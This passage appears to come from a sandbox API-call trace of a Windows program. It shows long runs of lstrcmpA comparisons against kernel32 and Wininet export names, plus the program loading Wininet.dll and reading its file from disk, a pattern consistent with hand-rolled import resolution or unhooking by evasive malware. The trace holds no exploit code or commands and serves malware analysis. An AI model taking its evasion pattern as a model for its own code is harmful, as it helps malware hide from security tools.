(lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0165.642] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0165.642] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0165.642] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0165.642] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0165.642] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0165.642] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0165.642] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0165.642] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0165.642] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0165.643] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0165.644] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0165.644] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0165.645] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.645] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0165.645] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0165.645] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0165.645] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0165.645] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0165.646] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0165.646] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0165.646] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0165.646] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0165.646] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0165.646] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0165.646] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0165.646] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0165.647] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0165.647] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0165.647] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.647] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0165.647] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0165.647] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0165.647] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0165.647] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0165.647] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0165.647] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0165.647] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0165.648] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0165.648] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0165.648] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0165.648] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0165.649] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0165.649] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0165.649] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0165.649] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0165.649] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0165.649] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0165.649] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0165.649] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0165.649] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0165.649] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0165.660] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0165.660] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0165.660] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0165.660] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0165.660] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0165.660] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0165.660] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0165.660] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0165.661] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0165.669] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0165.670] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0165.670] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0165.670] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0165.670] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0165.670] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0167.151] GetProcessHeap () returned 0x580000 [0167.151] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ac5f0 | out: hHeap=0x580000) returned 1 [0167.281] GetProcessHeap () returned 0x580000 [0167.281] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x599240 [0167.282] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0167.306] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0167.306] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0167.307] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0167.307] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0167.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0167.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0167.307] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0167.307] GetProcessHeap () returned 0x580000 [0167.307] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x286600) returned 0x40ba040 [0167.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0167.315] ReadFile (in: hFile=0x140, lpBuffer=0x40ba040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40ba040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0167.757] CloseHandle (hObject=0x140) returned 1 [0167.758] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0167.758] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0167.758] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0167.758] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0167.758] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0167.758] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0167.758] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0167.758] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0167.758] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.758] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0167.759] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0167.759] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0167.759] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0167.759] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0167.759] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0167.760] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0167.760] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 